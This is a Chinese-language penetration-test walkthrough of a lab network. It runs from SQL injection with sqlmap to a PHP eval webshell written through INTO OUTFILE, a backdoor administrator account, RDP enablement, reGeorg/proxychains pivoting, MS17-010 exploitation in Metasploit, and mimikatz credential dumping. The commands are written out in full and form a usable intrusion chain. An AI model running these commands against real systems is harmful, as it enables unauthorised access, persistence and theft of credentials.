0x01 滲透測試過程
通過滲透網站拿到webshell,然后通過webshell拿到網站主機系統權限,發現受害主機有兩張網卡,另一張網卡下有兩台存活的內網主機,然后我們就嘗試滲透存活的內網主機看能不能拿到系統權限,最后發現兩台內網主機都開啟了445端口,然后搜索了一下445端口漏洞發現有個最新的m17_010可能可以利用,結果真的通過ms17_010成功獲得了內網主機的權限。
目標網站ip:192.168.31.196
瀏覽網站通過手工測試發現http://url/hr/hr.php?hrid=15處有注入點
嘗試利用sqlmap工具跑一下這個注入點,看能不能注出有用的信息
通過測試發現這個注入點果然可以進行注入
然后利用該注入點進行嘗試注出網站后台登錄賬號密碼
發現跑出來的網站后台密碼是用md5加密的,所以利用md5解密一下,發現只有兩個權限較低的密碼可以解密,而權限較高的admin賬號解不開。不過問題不大,先用登錄后台(后台登錄界面可以用御劍跑出來)看一下
利用御劍跑出的后台目錄里有個phpinfo頁面,說不定可以得到一些有用的信息
發現可以得到網站文件的絕對路徑
發現網站后台數據維護處可以執行sql語句,通過phpinfo頁面知道了網站絕對路徑,可以嘗試在此處寫入php一句話木馬
select "<?php eval($_POST[123456]);?>" into outfile "/UPUPW_AP5.2/vhosts/jy.test.com/321.php"
發現可以執行成功
嘗試用蟻劍(菜刀也可以)連接,發現成功連接
利用蟻劍虛擬終端創建一個用戶並將其加入到管理員組
net user ddd 123456 /add net localgroup Administrators ddd /add
然后開啟3389端口就可以通過3389端口遠程控制目標機了
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
用netstat -an命令查看發現成功開啟3389端口
用arp -a命令發現目標機有兩塊網卡,有一塊網卡是內網ip,我們開始嘗試滲透內網
0x02 內網滲透測試
目標機ip:192.168.238.129、192.168.238.130
kali攻擊機ip:192.168.31.119
1. 測試思路
因為我們已經成功getshell了ip為192.168.31.196的主機,而238段的內網ip是它的另一塊網卡下的主機,所以可以利用已經getshell的這台主機作為代理去滲透238段的主機
2. 滲透過程
利用蟻劍在該網站根目錄上傳一個reGeorgSocksProxy的php腳本文件
設置kali的proxychains代理地址和端口,命令:vi /etc/proxychains.conf將dynamic_chain前的#去掉
設置代理地址和端口后:wq退出
配置好后通過reGeory來打通本地和目標的通道,出現如下畫面則連接成功
python reGeorgSocksProxy.py -p 9050 -l 0.0.0.0 -u http://192.168.31.196/tunnel.php
本地所有工具都可通過目標服務器進一步攻擊所有工具使用命令前加 proxychains,這樣kali的所有工具就如同全部在內網那台getshell的服務器上
用nmap掃描內網的兩個ip開放的端口發現都有445端口,192.168.238.129為03系統 ,192.168.238.130為xp系統,這里以192.168.238.130這台主機為例
用msfconsole搜索發現445端口有一個ms17_010的漏洞,可以嘗試反彈shell
設置好利用ms17_010所需要的參數
use exploit/windows/smb/ms17_010_psexec #切換到ms17漏洞模塊 set RHOST 192.168.238.130 #設置目標機ip run #開始連接
成功反彈到shell,然后就可以查看目標機的一些信息了
添加一個新用戶名賬號,發現成功添加
run getgui -u ding(用戶名) -p 123456(密碼)
利用mimikatz工具查看系統管理員賬號密碼
load mimikatz #啟動mimikatz
msv #查看管理員密碼hash
也可以利用mimikatz獲取到密碼明文
kerberos #獲取管理員密碼明文
獲取到明文管理員賬號密碼后就可以開啟遠程桌面用管理員賬號密碼進行登錄系統了
成功遠程登錄到目標桌面
